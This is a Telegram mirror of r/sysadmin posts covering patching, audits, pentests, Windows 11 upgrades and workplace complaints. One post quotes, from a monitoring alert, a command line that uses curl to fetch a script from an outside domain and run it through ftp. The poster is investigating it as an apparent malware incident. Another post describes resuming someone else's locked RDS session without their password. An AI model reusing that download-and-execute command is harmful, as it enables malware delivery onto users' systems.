-
Reddit SystemAdmin. Thanks @reddit2telegram and @r_channels.
How are you handling printers in 2025?
We are hybrid but slowly moving resources to the cloud. What's the recommended replacement for traditional print servers?
https://redd.it/1m85e0n
@r_systemadmin
The upcoming audit has me stressed
Our external ISO audit is in six weeks and I'm already stressed out. The evidence collection process is an absolute nightmare. I spend weeks just chasing people down for documents, training records, meeting minutes... it's all buried in emails and a dozen different shared drives. It's a horrible, manual process.
https://redd.it/1m7ynzt
@r_systemadmin
Customer is able to resume RDS session without knowing the password
Maybe it's by design but I was surprised that this is possible.
Customer uses a Remote Desktop farm with Server 2025 RDS Gateway/Loadbalancer with multiple 2025 RDS session hosts.
The .RDP file is on the local pc's desktop.
User A doubleclicks the .RDP file and enters username/password. There is no option to save credentials, this has been disabled by reg file on the pc.
When User A is going on a lunchbreak, user locks the RDS session itself, not the local pc. The local pc currently has a password that everyone knows. All pc's are for common use, the pc's are not domain joined.
If User B walks up to this pc and finds a locked RDS session. Password is unknown to User B..
Now when you minimize the RDS session (not close it with the X up top) and you doubleclick the .RDP file again on the desktop the session is logged in again without having to enter a password. User B now has access to User A's RDS session.. Without knowing the password. User A never saved credentials.
Is this by design or a bug? I can reproduce this only with a RDS gateway/load balancer farm. Not with a single RDS host.
https://redd.it/1m809bq
@r_systemadmin
Looks like Microsoft have made Token Protection available for Entra P1
https://ourcloudnetwork.com/microsoft-makes-token-protection-available-for-entra-id-p1-licenses/ can't see any official announcement from Microsoft, but according to changes in the Microsoft Entra, Token Protection either is or is soon to be available for Entra P1 customers. Previously paywalled behind P2..
https://redd.it/1m7wx11
@r_systemadmin
So we're just leaving DCs unpatched in 2025??? 😵
Just started a new gig & learned immediately that the DCs are missing 2 years worth of patches. this a normal thing in the IT realm? Are IT Pros just not patching their DCs? Rhetorically this has to be a NO!
Anyway, in a 1 forest environment with 2 or more DCs are you splitting your FSMO roles by Forest/ Domain between the DCs like Microsoft tells you? or Do you transfer them when you patch your system or just leave them on the primary DC since downtime shouldn't be long? Just aiming for best practice/ approach at this point.
I know.. so many questions for such an inquisitive concerned IT dude. Pass me my snifter & pour me some Bourbon will ya?!!
https://redd.it/1m7kvui
@r_systemadmin
Really hate troubleshooting with people who dont follow directions
So this morning someone from the office messaged me saying the office internet wasn't working and so i login to our network dashboard and see everything is green so good to go. I have them check the IP phones and those are good to go and i check our security cameras and those are live so internet isnt the problem.
We use docks at work and i thought ok, maybe the dock went bad so i have them use the one at the spare desk to see if that works and thats where i get radio silence for ten minutes. I ask again after a while so is there internet and they send me a photo of the laptop back on their desk, i can tell cause of the items around the desk and im like so did it work at the spare desk and again radio silence.
So i go get some coffee from the fridge and come back to a call and another unrelated picture of the user trying to do something else without internet and then they connect to a separate network and at that point i already wasted a bunch of time with no feedback or results so i just ignore this person. Users like this just annoy me to no end. Cant follow directions and expect you to work magic or something.
https://redd.it/1m7fk20
@r_systemadmin
Fired for gambling
Saw someone talk about the sudden growth of gambling sites over the past year and it reminded me of something that happened last year but we still have to deal with on occasion.
We have a pretty lax system of moderating websites at my office where if you don’t do something stupid we don’t stop you from listening to Spotify or sharing YouTube videos in company messages. We do have a banned web list that’s basically anything XXX related or anything black listed by corporate like 4chan or piracy websites.
One day we get notified that someone has been spending a ton of time on this website that’s been flagged but not blocked on their work computer and when I checked it out it was a crypto gambling website with a bunch of weird games. We look into the user and it’s an intern who just started and has spent a solid chunk of their day gambling on this and several other websites. We don’t know for sure how much this person won or lost but once the people in charge found out the intern was let go near immediately for being a security risk. This kid basically threw away an internship at a fairly large company because he couldn’t stop gambling.
https://redd.it/1m7f17g
@r_systemadmin
Are all security consultants useless?
I can't be the only SysAdmin getting increasingly more and more fed up with having to deal with security consultants who don't have a clue what they're doing can I?
It probably doesn't help that their standard pay seems to be much higher and yet their ability to apply knowledge sensibly is completely lacking.
I have to deal with several NHS trusts and so granted they're probably bottom of the barrel security consultants be even so, it's infuriating.
Last week one of them wrote to us as they'd pentested the service we host for them and found several security headers were missing. I knew they were there so that was odd and also there should have been a number of other low scoring vulnerabilities that were missing.
First off I speak to the other admin, we've had no request to turn off or bypass their WAF so that would have hidden pretty much all the vulnerabilities but even more impressive I realised he had run the pentest using an external tool. As part of his initial security requirements for our product we blocked connectivity to the portal from everywhere other than 3 public IP addresses. So essentially he has pentested absolutely nothing...
I pointed this out to him and his response was that he will mark it as a false positive... And that we've passed the pentest....WTF!
As the SysAdmin I'm happy to get it off my plate but as a member of the UK public a part of me feels the need to raise this ineptitude within the trust because god knows what else this guy has signed off without having a clue what he is doing...
Please restore my faith and let me know there are some good ones somewhere....
https://redd.it/1m7cg21
@r_systemadmin
Microsoft! Stop using upper i and lower L in LAPS passwords! Or at least use a font that shows a difference.
If one of those characters is used probably 90% of the time the guess is wrong. And of course you can't copy and paste, which would also solve the issue. Getting UI artists who never have to use the interfaces in production to find the right aesthetics may make the SCP who signed off proud of himself and feel like such bold leadership and decision-making justifies tens of millions in salary, perks, benefits, and stock options. It doesn't.
https://redd.it/1m7a9lx
@r_systemadmin
Insurance company going to do Internal Pen Test. I attempted to Lock the network down beforehand.
The company I work for has their insurance company running an internal pen test where they connect a box to the internal network and attempt to scan the network. Before they came out, I did the following: was it enough?
1) Upgraded all domain and file servers to Windows Server 2025. Set the domain and forest function level to server 2025. And made sure all servers were fully patched.
2) I have Meraki Switches, and I already have many settings enabled, including DHCP Guard, RA Guard, and DAI. I added firewall rules to drop all LLMNR NBT-NS traffic on the network. I already had the registry and GPO objects set, but Responder was still showing traffic. With the firewall rules in place, responder was completely quiet. I also already had SMB signing enabled and LDAP channel binding enabled as well.
3) I have Dell servers with iDRAC, and I upgraded all the firmware on the servers.
4) All PCs and servers have an EDR solution installed and are configured to reboot automatically for Windows updates.
5) I have Ricoh copiers, and I configured the access control on the printers to only allow traffic from the print server.
Do you think this is enough, or should I have done more?
https://redd.it/1m76i2f
@r_systemadmin
158-year-old company forced to close after ransomware attack precipitated by a single guessed password — 700 jobs lost after hackers demand unpayable sum
https://www.tomshardware.com/tech-industry/cyber-security/158-year-old-company-forced-to-close-after-ransomware-attack-precipitated-by-a-single-guessed-password-700-jobs-lost-after-hackers-demand-unpayable-sum
Invest in IT security, folks. Immutable 321 backups, EPPs, Fine grain firewall rules, intrusion detections, MFAs, etc.
https://redd.it/1m6z0e6
@r_systemadmin
Team members using AI for everything and it’s driving me nuts
Why is it i see that all the team members i work with make no effort to learn the proper way to troubleshoot and instead ask the AI questions as if they don’t have their jobs to learn that information and make sense of it?
It’s very apparent with team members who have no idea what they are doing and use 0 discretion with what they bring from it and it’s driving me NUTS.
https://redd.it/1m6usfk
@r_systemadmin
Sysadmin for 200 people, completely self-taught – now got an offer from an MSP. Would you switch?
I’ve been a full-time sysadmin in a mid-sized company (200 employees) for 2 years - Germany - No formal training – everything self-taught. Before that, I was self-employed in a different field, but already handled IT for ~80 people.
Now I am the entire internal IT – a true one-man army.
I manage:
Microsoft 365 tenant
Google Workspace
HubSpot
Asana
Atlassian (Jira/Confluence)
Our custom backend
All hardware, licenses, support, user management
I introduced and set up almost everything myself, documented it, automated a lot. I’m the only one who actually understands how all the tools work and how they’re connected.
No bureaucracy, no micromanagement, no unnecessary processes. I decide what to do, when, and how. Sounds great – but there’s a catch.
For over a year, I’ve been told I’d get support from a senior – still hasn’t happened.
Over the last 7 months I’ve racked up 100+ overtime hours. Even when I’m on vacation, I have to be available because some things just don’t work without me. SharePoint is full of documentation, but it’s useless if no one even knows where to start.
Current conditions:
4,400 gross/month
30 days of vacation (22 used/planned this year – incl. 10 carried over)
→ So again 18 days rolled over into next year
25 days of workation (10 used)
Now I’ve got an offer (wasn’t actively looking):
Admin at an MSP
€5,400 gross/month
30 vacation days
Company car
Unlimited workation
Part of a 20-person IT team
Pros: Significantly better pay, a team, a company car, I’m no longer on my own.
Cons: Less freedom, more documentation, more coordination, more rules. I’d no longer just decide everything myself.
Right now, I don’t really have to report to anyone. That gives me a lot of freedom – but also a lot of responsibility and stress.
Would you take the offer or stay?
https://redd.it/1m6rbbn
@r_systemadmin
How are y'all handling the Windows 11 upgrade for 100% remote users that cannot come to an office?
I'm a lowly tier 2 tech trying to finish the upgrade before Microsoft makes us open the wallet, and I'm down to the final few dozen computers. I've only got two users this applies to, thankfully. I tried getting it done with Windows update as that seemed like the easiest route and it's failing with a generic error.
The computers are domain joined, and using the ISO to do the inplace upgrade fails until the computer is taken off the domain.
The only other method we have, that also is the only one that not only never fails but also bypasses the compatibility issues, is MDT. But that's not viable for this.
I've asked if the company will ship their computers to my building and back to them, but they said no.
How have you guys been tackling this scenario?
https://redd.it/1m6ltzc
@r_systemadmin
MSPs/sysadmins with a lot of VMs deployed, how often do your backups fail?
Are they just flawless 24/7? Are there some failures here and there with automatic retries being successful? Do they fail a lot and need manual intervention to fix?
https://redd.it/1m6flzm
@r_systemadmin
How did KnowBe4 get so much of the market?
KnowBe4 have something like 85% of the SAT market, and their product is a B. Yes, they have a ton of modules and offer great pricing, but they are just no longer relevant. Their UI/UX feels like its from 2010, they dont do any deepfake or voice phishing, and their customer success (with smaller orgs especially) sucks. People are stuck in long contracts with them and it has become the norm, but is that really still necessary? People need to start rethinking this whole SAT thing.
https://redd.it/1m8ca7u
@r_systemadmin
End User wants me to be CIO now
I'm a sysadmin.
Not a product owner. Not a help desk. Not the C-suite (I don't even want that, but GOAT title - for me - is Security Engineer).
Word around the office is that "He is so good with tech,” I’m now expected to make C-suite-level business decisions… like whether our completely private, in-house-lead-based company needs a public-facing website. (Spoiler: we don’t, and I'm uncomfortable with this conversation already.)
But guess who keeps floating the idea? Yep.
Her.
The one with the biggest ideas and no context.
Latest development?
While refilling my coffee, the office admin casually mentions, “Hey, have you thought about setting up an on-call rotation for the help desk?”
Me, blinking in confusion: “We’re not a help desk.”
Her: “I know, but… people forget their passwords at home. Or they write them on a sticky note and accidentally use it as a coaster. It’s just a lot, you know?”
Yeah... No thanks. Not signing up for 24/7 ‘I-forgot-my-password’ duty because Brenda can’t be bothered to remember where her cat tossed her coffee cup, let alone her credentials.
Let’s be clear:
This isn’t a managed services shop.
We don’t do tier 1 support.
We already have self-service reset tools and MFA. (Thanks Microsoft for a healthy and wonderful marriage. Live. Laugh. Love.)
I’m just here trying to maintain uptime, push policy, and maybe get through a patch cycle in peace on Intune.
Anyone else constantly being volunteered for things you didn’t sign up for? That horror story I read a few weeks back about some sysadmin working help desk overtime on-call $60k really set me off, and I just had to stand my ground here.
https://redd.it/1m85yin
@r_systemadmin
Thickheaded Thursday - July 24, 2025
Howdy, /r/sysadmin!
It's that time of the week, Thickheaded Thursday! This is a safe (mostly) judgement-free environment for all of your questions and stories, no matter how silly you think they are. Anybody can answer questions! My name is AutoModerator and I've taken over responsibility for posting these weekly threads so you don't have to worry about anything except your comments!
https://redd.it/1m80azy
@r_systemadmin
How many of you don’t actually interact with end-users?
The last company I worked for, the Enterprise Infrastructure and SysAdmin positions were one and the same, and those guys literally never talked to end-users. Desktop support was always the go between, and I was just curious if that was the case for any of you guys as well? Also, is this why people become SysAdmins, so they don’t have to interact nearly as much with end-users as Helpdesk or desktop support?
https://redd.it/1m7skju
@r_systemadmin
Security team keeps breaking our CI/CD
Every time we try to deploy, security team has added 47 new scanning tools that take forever and fail on random shit.
Latest: they want us to scan every container image for vulnerabilities. Cool, except it takes 20 minutes per scan and fails if there's a 3-year-old openssl version that's not even exposed.
Meanwhile devs are pushing to prod directly because "the pipeline is broken again."
How do you balance security requirements with actually shipping code? Feel like we're optimizing for compliance BS instead of real security.
https://redd.it/1m7oeof
@r_systemadmin
Clorox outsources IT to incompetent company then sues them for incompetence
https://www.bleepingcomputer.com/news/security/hackers-fooled-cognizant-help-desk-says-clorox-in-380m-cyberattack-lawsuit/
In addition to this, Clorox described Cognizant's response and recovery support as overly incompetent, resulting in delays in the application of containment measures, failure to shut down compromised accounts, and sending underqualified personnel on premises.
weeeeiiiiiiiiiirrrrrd...... </s>
https://redd.it/1m7fq7s
@r_systemadmin
Does anyone else have like ZERO patience for developers that don't know how to computer?
I'll spend all goddamn day helping Barbathy in accounting figure out how to open Excel, but fuck me if I have to help someone figure out how to get a compiler that THEY USE ALL THE TIME TO WORK ON THEIR NEW SYSTEM for 5 seconds I'm immediately done with it. /rant over.
https://redd.it/1m7dgl0
@r_systemadmin
Defender for Cloud Apps Policies: Governance Actions
Hey /r/sysadmin,
Leadership wants us to configure alerts in Defender for Cloud Apps to notify us that a new and/or risky Generative AI app is being used. We **do not** want the apps to be blocked. I created a policy:
* If the risk score = 0-5 and the category is Generative AI
* Create an alert for each matching event with the policy's severity
* Trigger a policy match if all of the following occur on the same day: # of users > 1 and daily traffic > 50 MB
* Send alert as email
* Tag app as monitored
Well, a couple of hours after turning this on, our users started receiving warnings when trying to access certain sites.
I'm assuming I went wrong by selecting *Tag app as monitored* under **Governance actions,** but I'm unsure; I see no way to test this. Can someone confirm?
https://redd.it/1m7a4d9
@r_systemadmin
CVE-2025-26647 RHEL AD joins with realmd/sssd
hi,
anyone else having issues with RHEL AD joins with realmd/sssd after the patch?
https://redd.it/1m75x5m
@r_systemadmin
Sudden EXTERNAL tag on all inbound emails in Microsoft 365?
Was this change announced?
EDIT: on all inbound external mails. Seems to affect German tenants.
https://redd.it/1m71itq
@r_systemadmin
The "Google Cloud Console" - forgive my use of the F-word, but this is as tame as it gets!
Oh Google Cloud, you magnificent monument to user-maddening incompetence!
I’m the SUPER ADMIN of my damn organization, yet trying to create a simple project feels like trying to defuse a bomb with a spoon while blindfolded. First hurdle? Select a folder. Simple, right? Nope. Because apparently, even though I’m Super Admin, I don’t have resourcemanager.folders.create permission to create or access folders. That’s right. Every fucking click, every fucking step — a goddamn roadblock. A stupid permission or setting I have to give to myself before I can get a simple job done that should’ve taken 3 minutes and instead has turned into hour 2 of pure, unrelenting bullshit. Thanks, Google. Really.
Searching for roles is a whole other sadistic delight. “Project”? Nothing. Nada. Zero. So what do I do? Manually type roles/resourcemanager.projectCreator like some damn codebreaker because your UI clearly thinks it’s a game of "How much can we fuck with this user before they break to our will" and desperately hold off treating your pc to a sledgehammer. Spoiler, I'm looking around the room.
Oh, and creating a folder? FAT chance super admin! You're missing six different permission roles to do something so fucking simple. Again. And try to find them in the list - NICE TRY BUDDY!! The UI won’t show it unless I spell out the entire goddamn role ID like I'm reading an incantaiontion from the necromonger. Army of the dead and chainsawed off arm was easier was get through.
And your OAuth consent screen, Google. Just brillant. Congrats of building the real dream - just like most sweat inducing nightmares I have fill out endless forms that make the DMV look like a joyride. Logos, emails, scopes and an endless, soul-sucking vortex of red tape just to pull analytics data, not to steal the whole damn internet.
Google Cloud Platform: you miserable thing, you’re not just frustrating, you’re a monument to obnoxious, incompetent, user-maddening garbage design that seems engineered solely to destroy any shred of sanity I had left. Is this the truman show?? Where does it end?!
At this point, I’m this close to putting my laptop into a vice and checking into rageaholics.
If you’ve survived this hell, consider yourself a warrior. If not… good luck. You’ll need it. Keep the xanax close.
Now... where did I put that fucking sledgehammer?
https://redd.it/1m6xuf0
@r_systemadmin
Another ticket from hell
This one really pisses me off because malware is my specialty and it has me completely stumped. Got an alert from our monitoring system that CMD tried to run something with odd behavior and was terminated. I have no idea what called cmd.exe to do this. The report says "explorer.exe"
The detection was triggered for 'C:\\WINDOWS\\system32\\cmd.exe' /i /c cd C:\\Users\\[username\] && curl.exe --proto-default httP -L -o 'dcf.log' keanex[.\]com/lks[.\]php && ftp -s:dcf.log && cfapi : 2470.', which was spawned from 'explorer.exe' . The command line was used to download and execute files from a remote server, potentially part of a malware attack
Isn't that linux bash commands? This is windows 11.
I can't find a damn thing about Keanex except it's a youtuber that makes or sells headphones or something and the website was a Philippines network solution provider in 2012 then went silent on the wayback machine. That domain has a completely safe/neutral reputation in every checker.
Now their site loads an empty HTML tag.
I tried to load that exact php script in firefox on our linux testing VM, got a 403 error.
Her web history didn't load a website in the last hour and nothing today was malicious, in all browsers btw.
No files acting suspiciously in Adobe Reader, Word, Excel file history. Nothing in downloads. Checked entire system with Autoruns. Only unsigned code was this stupid check scanner we've always used that's required for 1 bank. Never had a problem with that. Every single runonce, task, etc was accounted for. Full antivirus scan came up with nothing.
How the hell can a command window just randomly open? What could cause explorer to be able to call cmd.exe? Why can't I find the source?
In the meantime, I blocked that domain in the hosts file but I cannot just leave this, obviously. I'd blow it away but this is the #1 computer we cannot do that to without it being absolute hell on Earth to reload. It would probably take a week and I'm on PTO tomorrow. Not happy with this one. Any insights on this type of attack, if it was legitimate traffic somehow, or what can cause this and where to look for it would be very appreciated. Also, what could dcf.log be, was it going upward or downward via FTP, would that command syntax even run on windows, does windows even use CURL.exe, and why is this week such a nightmare?
https://redd.it/1m6nhfq
@r_systemadmin
Third-Party company wants to install F5 Endpoint Inspection on our systems
I don't have any experience with this software but a third-party company wants to install F5 Endpoint Inspection on our company devices that will access their shared files through the F5 VPN. From my understanding this will give the third-party company access to a ton of information about our devices and security measures which is already something I am not too keen on. Am I correct in not wanting to give this company access to our devices or is this software not as extreme as it seems? The documentation is pretty spotty and I don't know if it also gives them remote access to execute actions on our devices. Any information or advice on this software would be appreciated.
Edit: Confirmed what I had thought, we will definitely not be allowing this software to be installed. If the VPN doesn't work without it we will create a standalone PC with no access to our network to work with their files. This was our original fallback plan but wanted to confirm.
https://redd.it/1m6lsgs
@r_systemadmin
Does anyone celebrate Sysadmins Day any more?
It's coming up on Thursday but haven't seen anything about it other than a few isolated questions.
https://redd.it/1m6lfm7
@r_systemadmin
Cluster Service might fail to function properly after installing KB5062557
After installing the July Windows security update (the Originating KBs listed above), the Cluster Service on Windows Server 2019 might repeatedly stop and restart, causing nodes to fail to rejoin the cluster or enter quarantine states, virtual machines to experience multiple restarts, and frequent Event ID 7031 errors within event logs. This issue only occurs in configurations using BitLocker with Cluster Shared Volumes (CSV).
Workaround:
If you need help to manage this issue on your organization and apply a mitigation, please contact Microsoft’s Support for business.
Next Steps: We are working to include the resolution in a future Windows update. Once the update with the resolution is released, organizations will not need to install and configure the mitigation provided from Microsoft’s Support for business.
https://redd.it/1m6enak
@r_systemadmin